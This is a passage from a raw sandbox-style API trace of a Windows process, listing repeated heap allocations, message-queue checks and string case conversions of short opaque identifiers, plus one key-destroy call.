wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0257.313] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.313] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0257.314] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.314] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.314] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0257.314] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.314] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.314] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.314] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.315] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.315] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.315] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.315] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.315] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.315] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.316] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.316] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.316] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.317] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.317] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.318] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0257.318] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.318] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0257.318] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.318] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.318] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.319] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.319] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.319] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.319] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.320] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.320] CryptDestroyKey (hKey=0xaa5960) returned 1 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0257.320] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.320] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.321] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.321] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.321] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.321] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.321] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.321] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.321] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.322] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.322] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.322] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.323] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0257.323] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0257.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.323] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.323] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.323] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.323] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.323] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.324] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.324] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0257.324] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.325] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.325] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0257.325] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.325] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0257.326] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.326] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.326] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0257.326] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.326] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.326] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.326] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.326] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.327] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.327] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 